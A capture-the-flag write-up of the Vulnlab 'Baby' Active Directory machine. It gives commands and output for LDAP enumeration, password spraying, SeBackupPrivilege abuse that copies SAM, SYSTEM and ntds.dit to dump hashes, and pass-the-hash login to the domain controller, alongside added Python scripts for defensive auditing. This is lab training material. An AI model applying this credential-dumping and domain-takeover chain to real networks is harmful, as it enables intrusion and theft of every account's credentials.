BABY is a Windows Active Directory machine created by xct on Vulnlab. It involves enumerating LDAP for users and a credential left in an account description to gain initial access, then abusing the “SeBackupPrivilege” user right to dump the hashes from NTDS.dit and gain administrative access to the domain controller.
Overview
Active Directory Pentesting
- Baby (Solo, Windows)
- Junior Level Windows Active Directory Machine
- You will learn about LDAP-Enumeration & Windows Privileges
Enumeration
Nmap Scan:
nmap 10.10.96.250 -sCV --min-rate 400 --max-retries 130
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-26 09:34 EDT
Nmap scan report for 10.10.96.250
Host is up (0.28s latency).
Not shown: 986 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-03-26 14:34:49Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: BABY
| NetBIOS_Domain_Name: BABY
| NetBIOS_Computer_Name: BABYDC
| DNS_Domain_Name: baby.vl
| DNS_Computer_Name: BabyDC.baby.vl
| Product_Version: 10.0.20348
|_ System_Time: 2025-03-26T14:35:07+00:00
| ssl-cert: Subject: commonName=BabyDC.baby.vl
| Not valid before: 2025-03-25T14:11:32
|_Not valid after: 2025-09-24T14:11:32
|_ssl-date: 2025-03-26T14:35:48+00:00; +1h00m26s from scanner time.
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: BABYDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h00m25s, deviation: 0s, median: 1h00m25s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-03-26T14:35:07
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 78.26 seconds
LDAP User Enumeration
With unauthenticated LDAP enumeration, I found the domain's users (groups also carry a sAMAccountName, so they show up in the same list):
ldapsearch -v -x -b "DC=baby,DC=vl" -H "ldap://10.10.96.250" "(objectclass=*)"
ldapsearch -v -x -b "DC=baby,DC=vl" -H "ldap://10.10.96.250" "(objectclass=*)" | grep -i sAMAccountName:
ldap_initialize( ldap://10.10.96.250:389/??base )
filter: (objectclass=*)
requesting: All userApplication attributes
sAMAccountName: Guest
sAMAccountName: Domain Computers
sAMAccountName: Cert Publishers
sAMAccountName: Domain Users
sAMAccountName: Domain Guests
sAMAccountName: Group Policy Creator Owners
sAMAccountName: RAS and IAS Servers
sAMAccountName: Allowed RODC Password Replication Group
sAMAccountName: Denied RODC Password Replication Group
sAMAccountName: Enterprise Read-only Domain Controllers
sAMAccountName: Cloneable Domain Controllers
sAMAccountName: Protected Users
sAMAccountName: DnsAdmins
sAMAccountName: DnsUpdateProxy
sAMAccountName: dev
sAMAccountName: Jacqueline.Barnett
sAMAccountName: Ashley.Webb
sAMAccountName: Hugh.George
sAMAccountName: Leonard.Dyer
sAMAccountName: it
sAMAccountName: Connor.Wilkinson
sAMAccountName: Joseph.Hughes
sAMAccountName: Kerry.Wilson
sAMAccountName: Teresa.Bell
sAMAccountName: Caroline.Robinson
Grepping the same output for description attributes, I found a credential left in a user account's description:
ldapsearch -v -x -b "DC=baby,DC=vl" -H "ldap://10.10.96.250" "(objectclass=*)" | grep -i desc
description: Set initial password to BabyStart123!
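The two greps above work, but a parser that walks the LDIF properly catches things grep misses: folded continuation lines and base64-encoded (`::`) values, which ldapsearch emits for non-ASCII or leading-space text. The script below is an added example written for this write-up, not code from the machine or from ldapsearch. It parses ldapsearch output, separates user objects from groups, and flags free-text attributes (description, info, comment) that look like they hold a credential, which is the audit a defender should run against their own directory. The LDIF is constructed test data; only the description text comes from this page.

```python
import base64
import re

# Constructed sample in the shape of `ldapsearch -x -b "DC=baby,DC=vl" "(objectclass=*)"`
# output: one group, two users, a base64 attribute (the "::" form) and a folded
# continuation line. Test data only, not a capture from the lab.
SAMPLE_LDIF = """\
# extended LDIF
#
# LDAPv3

dn: CN=Domain Users,CN=Users,DC=baby,DC=vl
objectClass: top
objectClass: group
sAMAccountName: Domain Users

dn: CN=Teresa Bell,OU=it,DC=baby,DC=vl
objectClass: top
objectClass: person
objectClass: user
sAMAccountName: Teresa.Bell
description: Set initial password to BabyStart123!
userAccountControl: 66048

dn: CN=Hugh George,OU=dev,DC=baby,DC=vl
objectClass: top
objectClass: user
sAMAccountName: Hugh.George
description:: RGV2ZWxvcGVyIGFjY291bnQ=
info: Please contact the
  helpdesk for onboarding
userAccountControl: 512

# search result
search: 2
result: 0 Success
"""

ATTR_RE = re.compile(r"^([A-Za-z][\w;.-]*)(::?)\s?(.*)$")


def unfold(text):
    """Join LDIF continuation lines (a leading space means 'continues the previous line')."""
    out = []
    for line in text.splitlines():
        if line.startswith(" ") and out:
            out[-1] += line[1:]
        else:
            out.append(line)
    return out


def parse_ldif(text):
    """Return a list of entries, each {attribute_lowercase: [values]} with a 'dn' key.
    Base64 values ('attr:: ...') are decoded; lines outside a dn block are dropped."""
    entries, current = [], {}
    for line in unfold(text):
        if not line.strip():
            if current.get("dn"):
                entries.append(current)
            current = {}
            continue
        if line.startswith("#"):
            continue
        m = ATTR_RE.match(line)
        if not m:
            continue  # ldapsearch chatter such as "ldap_initialize( ... )"
        name, sep, value = m.group(1).lower(), m.group(2), m.group(3)
        if sep == "::":
            value = base64.b64decode(value).decode("utf-8", "replace")
        if name == "dn":  # a new dn always starts a new entry
            if current.get("dn"):
                entries.append(current)
            current = {}
        current.setdefault(name, []).append(value)
    if current.get("dn"):
        entries.append(current)
    return entries


def list_accounts(entries):
    """sAMAccountNames of user objects only (groups also carry sAMAccountName in AD)."""
    return [e["samaccountname"][0] for e in entries
            if "samaccountname" in e
            and "user" in [c.lower() for c in e.get("objectclass", [])]]


# Free-text attributes that administrators are known to misuse for notes such as
# "initial password is ...". The pattern is a heuristic, so review hits by hand.
NOTE_ATTRS = ("description", "info", "comment")
CRED_RE = re.compile(r"\b(pass(word|wd|phrase|code)?|pwd|cred(ential)?s?|secret|pin)\b", re.I)


def find_credential_leaks(entries):
    """Return (sAMAccountName, attribute, value) for note fields that look like a credential."""
    hits = []
    for e in entries:
        sam = e.get("samaccountname", e["dn"])[0]
        for attr in NOTE_ATTRS:
            for value in e.get(attr, []):
                if CRED_RE.search(value):
                    hits.append((sam, attr, value))
    return hits


if __name__ == "__main__":
    parsed = parse_ldif(SAMPLE_LDIF)
    print("users:", list_accounts(parsed))
    for sam, attr, value in find_credential_leaks(parsed):
        print(f"[!] {sam}: {attr} = {value!r}")
```

Feeding real ldapsearch output into `parse_ldif` (for example via `sys.stdin.read()`) is the only change needed to run this against a live export; the base64 and continuation handling is what keeps a credential from hiding behind a `::` line that a plain `grep -i desc` would print as gibberish.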
With Kerbrute I verified which of the users I found are valid accounts:
kerbrute -domain baby.vl -users user.txt -dc-ip 10.10.96.250
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Valid user => Ashley.Webb
[*] Valid user => Hugh.George
[*] Valid user => Leonard.Dyer
[*] Valid user => Ian.Walker
[*] Valid user => Connor.Wilkinson
[*] Valid user => Joseph.Hughes
[*] Valid user => Kerry.Wilson
[*] Valid user => Teresa.Bell
[*] Valid user => Caroline.Robinson
I saved the valid users in users.txt and used the list for password spraying with the discovered password:
crackmapexec smb 10.10.76.62 -u user.txt -p 'BabyStart123!' --continue-on-success
SMB 10.10.76.62 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False)
SMB 10.10.76.62 445 BABYDC [-] baby.vl\Jacqueline Barnett:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.76.62 445 BABYDC [-] baby.vl\Ashley.Webb:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.76.62 445 BABYDC [-] baby.vl\Hugh.George:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.76.62 445 BABYDC [-] baby.vl\Leonard.Dyer:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.76.62 445 BABYDC [-] baby.vl\Dyer:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.76.62 445 BABYDC [-] baby.vl\Ian.Walker:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.76.62 445 BABYDC [-] baby.vl\Connor.Wilkinson:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.76.62 445 BABYDC [-] baby.vl\Joseph.Hughes:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.76.62 445 BABYDC [-] baby.vl\Kerry.Wilson:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.76.62 445 BABYDC [-] baby.vl\Teresa.Bell:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.76.62 445 BABYDC [-] baby.vl\Caroline.Robinson:BabyStart123! STATUS_PASSWORD_MUST_CHANGE
The Caroline.Robinson account accepts the password but requires it to be changed!
Password change using smbpasswd:
smbpasswd -U caroline.robinson -r 10.10.76.62
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user caroline.robinson on 10.10.76.62.
I successfully changed caroline’s password:
User: caroline.robinson
Password: Pass123 (new password)
Evil-WinRM:
Using evil-winrm I logged into Caroline's account:
evil-winrm -i 10.10.76.62 -u Caroline.Robinson -p 'BabyStart123!' -s /tmp

Exploitation:
Checking the permissions the user has on the domain with “whoami /all”, the user holds the privileges
SeBackupPrivilege and SeRestorePrivilege.
This privilege is designed to let users create system backups, and to do that it grants read access to every file on the file system regardless of its ACL. From an attacker's viewpoint, abusing it means gaining initial access as a user who holds it, then using that access to read the SAM and SYSTEM hives and potentially crack the passwords of high-privilege users on the system or network.
*Evil-WinRM* PS C:\users\Caroline.Robinson\desktop> whoami /all
USER INFORMATION
----------------
User Name SID
====================== ==============================================
baby\caroline.robinson S-1-5-21-1407081343-4001094062-1444647654-1115
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
BABY\it Group S-1-5-21-1407081343-4001094062-1444647654-1109 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
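Reading “whoami /all” by eye works for one host, but the same check is worth scripting when reviewing many tokens, for instance the output collected from service accounts or from a remote-management session. The parser below is an added example written for this write-up (not code from the machine, Vulnlab or Evil-WinRM): it parses the user, group and privilege sections of a “whoami /all” dump and reports the built-in groups and user rights that amount to ACL-bypassing file access, which is exactly what makes Backup Operators membership on a domain controller equivalent to domain compromise. The sample output is constructed in the command's column layout; the SIDs for Backup Operators and the other built-in aliases are the well-known values, the risk notes are my own wording.

```python
import re

# Constructed `whoami /all` output in the aligned-column layout the command prints,
# trimmed to a few rows. Test data, not a capture from the lab.
WHOAMI_OUTPUT = r"""
USER INFORMATION
----------------

User Name              SID
====================== ==============================================
baby\caroline.robinson S-1-5-21-1407081343-4001094062-1444647654-1115


GROUP INFORMATION
-----------------

Group Name                         Type             SID          Attributes
================================== ================ ============ ==================================================
Everyone                           Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators           Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users    Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BABY\it                            Group            S-1-5-21-1407081343-4001094062-1444647654-1109 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label          S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
"""

SECTION_RE = re.compile(r"^(USER|GROUP|PRIVILEGES) INFORMATION$")
USER_RE = re.compile(r"^(?P<name>\S+)\s+(?P<sid>S-1-[\d-]+)\s*$")
GROUP_RE = re.compile(r"^(?P<name>.+?)\s+(?P<type>Well-known group|Alias|Group|Label)\s+(?P<sid>S-1-[\d-]+)")
PRIV_RE = re.compile(r"^(?P<name>Se\w+Privilege)\s+.*?\s(?P<state>Enabled|Disabled)\s*$")


def parse_whoami(text):
    """Return {'user': (name, sid), 'groups': {name: sid}, 'privileges': {name: state}}."""
    result = {"user": None, "groups": {}, "privileges": {}}
    section = None
    for raw in text.splitlines():
        line = raw.rstrip()
        m = SECTION_RE.match(line)
        if m:
            section = m.group(1)
            continue
        if not line or set(line) <= {"-", "=", " "}:
            continue  # blank lines and the ---- / ==== separators
        if section == "USER" and (m := USER_RE.match(line)):
            result["user"] = (m["name"], m["sid"])
        elif section == "GROUP" and (m := GROUP_RE.match(line)):
            result["groups"][m["name"]] = m["sid"]
        elif section == "PRIVILEGES" and (m := PRIV_RE.match(line)):
            result["privileges"][m["name"]] = m["state"]
    return result


# User rights that bypass file or object ACLs outright; SeBackupPrivilege is the one
# this write-up abuses to copy the SAM/SYSTEM hives and ntds.dit.
RISKY_PRIVS = {
    "SeBackupPrivilege": "read any file regardless of ACL (SAM/SYSTEM hives, ntds.dit)",
    "SeRestorePrivilege": "write any file regardless of ACL",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeDebugPrivilege": "open any process, including LSASS",
    "SeImpersonatePrivilege": "impersonate clients after authentication",
    "SeLoadDriverPrivilege": "load kernel drivers",
}
# Well-known SIDs of built-in groups whose members get those rights on domain controllers.
RISKY_GROUP_SIDS = {
    "S-1-5-32-544": "Administrators",
    "S-1-5-32-548": "Account Operators",
    "S-1-5-32-549": "Server Operators",
    "S-1-5-32-550": "Print Operators",
    "S-1-5-32-551": "Backup Operators",
}


def assess(parsed):
    """List (kind, name, why) findings a reviewer of this token should look at."""
    findings = []
    for name, sid in parsed["groups"].items():
        if sid in RISKY_GROUP_SIDS:
            findings.append(("group", name, f"member of {RISKY_GROUP_SIDS[sid]} ({sid})"))
    for name, why in RISKY_PRIVS.items():
        state = parsed["privileges"].get(name)
        if state is not None:  # listed as Disabled still counts: the holder can enable it
            findings.append(("privilege", name, f"{why} [{state}]"))
    return findings


if __name__ == "__main__":
    token = parse_whoami(WHOAMI_OUTPUT)
    print("user:", token["user"])
    for kind, name, why in assess(token):
        print(f"[!] {kind}: {name}: {why}")
```

A "Disabled" state in the privileges section is not a mitigation: the right is still in the token and any process can enable it with AdjustTokenPrivileges, which is why the assessment reports the privilege whenever it is present.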
Backup Operators:
Caroline is a member of the Backup Operators group, so let's dump the system hashes.
https://www.hackingarticles.in/windows-privilege-escalation-sebackupprivilege
Let's copy the SAM and SYSTEM hives (and later ntds.dit) to the attacking machine so I can dump the hashes.
cd c:\
mkdir Temp
cd \Temp
reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system
After downloading the files, pypykatz or secretsdump can be used to obtain the Administrator hash:
pypykatz registry --sam sam system
...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8d992faed38128ae85e95fa35868bb43:::
However, we can't connect with this hash. Why? It's actually the local Administrator hash, which is not usable for logging in to a domain controller! Instead, we have to get the hash of the domain account (which has exactly the same name). To do this, we have to grab “ntds.dit” as well, using the Diskshadow & Robocopy method.
Diskshadow & Robocopy
Diskshadow and Robocopy are both Windows built-in utilities. Diskshadow creates a shadow copy of a volume that is currently in use, which we need because in-use system files such as ntds.dit are locked and cannot be copied directly, while Robocopy copies files and directories from one location to another (its /b switch copies in backup mode, which is what lets SeBackupPrivilege override the file's ACL).
Let's create a script which will create a full shadow copy of C:\ and expose it as a new drive with the letter E:.
nano script.dsh
set context persistent nowriters
add volume c: alias caro
create
expose %caro% E:
Run unix2dos to convert the script to DOS (CRLF) line endings, which diskshadow expects, and upload it to the server:
unix2dos script.dsh
Using the evil-winrm upload function, I uploaded the script to the compromised system and retrieved the ntds.dit file:
cd C:\Temp
upload script.dsh
diskshadow /s script.dsh
robocopy /b E:\windows\ntds . ntds.dit
Copy ntds.dit to the attack system using the evil-winrm download function and dump the hashes together with the sam and system files.
Now we can run secretsdump again, this time getting the domain account hashes by supplying “ntds.dit”:
impacket-secretsdump -ntds ntds.dit -system system local
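The reason the SAM hash failed while the NTDS hash works is that a domain controller's local SAM holds the Directory Services Restore Mode (DSRM) administrator, a separate account that merely shares the name “Administrator” with the domain account. Comparing the two dumps side by side is also a routine defensive audit: the same parsing shows whether the DSRM and domain Administrator passwords are identical, which domain accounts share a password, which have a blank one, and whether LM hashes are still being stored. The script below is an added example for this write-up, not code from Impacket; it parses secretsdump-format hash lines from both dumps and runs those checks. The SAM Administrator line is the one shown above; every other RID and hash (apart from Caroline's RID 1115 from the whoami output) is a made-up placeholder, and the empty-LM and empty-NT constants are the well-known hashes of the empty string.

```python
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "" (LM storage disabled)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of "" (blank password)

# Constructed secretsdump-style dumps. Only the SAM Administrator line comes from this
# write-up; the remaining hashes are placeholder hex and the RIDs (except 500-503 and
# Caroline's 1115) are invented.
SAM_DUMP = """\
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8d992faed38128ae85e95fa35868bb43:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""
NTDS_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:00000000000000000000000000000001:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:00000000000000000000000000000002:::
baby.vl\\Caroline.Robinson:1115:aad3b435b51404eeaad3b435b51404ee:00000000000000000000000000000003:::
baby.vl\\Kerry.Wilson:1112:aad3b435b51404eeaad3b435b51404ee:00000000000000000000000000000003:::
baby.vl\\Leonard.Dyer:1108:11111111111111111111111111111111:00000000000000000000000000000004:::
BABYDC$:1000:aad3b435b51404eeaad3b435b51404ee:00000000000000000000000000000005:::
[*] Kerberos keys grabbed
"""

# user:rid:lm:nt::: with an optional "domain\" prefix, as secretsdump prints for NTDS users
HASH_LINE_RE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:\\]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)


def parse_dump(text):
    """Map account name -> {'rid', 'lm', 'nt', 'domain'}; non-hash lines are ignored."""
    accounts = {}
    for line in text.splitlines():
        m = HASH_LINE_RE.match(line.strip())
        if m:
            accounts[m["user"]] = {"rid": int(m["rid"]), "lm": m["lm"].lower(),
                                   "nt": m["nt"].lower(), "domain": m["domain"]}
    return accounts


def audit(sam, ntds):
    """Compare a DC's SAM dump with its NTDS dump and run basic password-hygiene checks."""
    report = {"differs_between_sam_and_ntds": [], "reused_between_sam_and_ntds": [],
              "empty_password": [], "lm_hash_stored": [], "shared_password": []}
    # Same name in both stores: SAM "Administrator" is the DSRM account, not the domain one.
    for name in sorted(set(sam) & set(ntds)):
        a, b = sam[name]["nt"], ntds[name]["nt"]
        if EMPTY_NT in (a, b):
            continue
        report["reused_between_sam_and_ntds" if a == b else "differs_between_sam_and_ntds"].append(name)
    by_hash = defaultdict(list)
    for name, acct in sorted(ntds.items()):
        if acct["nt"] == EMPTY_NT:
            report["empty_password"].append(name)
        else:
            by_hash[acct["nt"]].append(name)
        if acct["lm"] != EMPTY_LM:
            report["lm_hash_stored"].append(name)  # LM is crackable in hours; disable its storage
    # Two domain accounts with one NT hash have the same password (no salt in NT hashes).
    report["shared_password"] = sorted(names for names in by_hash.values() if len(names) > 1)
    return report


if __name__ == "__main__":
    for key, value in audit(parse_dump(SAM_DUMP), parse_dump(NTDS_DUMP)).items():
        print(f"{key}: {value}")
```

The comparison never needs the plaintext: because NT hashes are unsalted, equal hashes mean equal passwords, which is what makes the "shared_password" and "reused_between_sam_and_ntds" checks possible straight from the dump output.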

We can log in using the domain Administrator hash (pass-the-hash):
evil-winrm -i 10.10.76.62 -u Administrator -H 'ee4457ae59f1e3***********' -s /tmp
I got Domain Controller Admin.
VL{9000cab96bcf62e990************}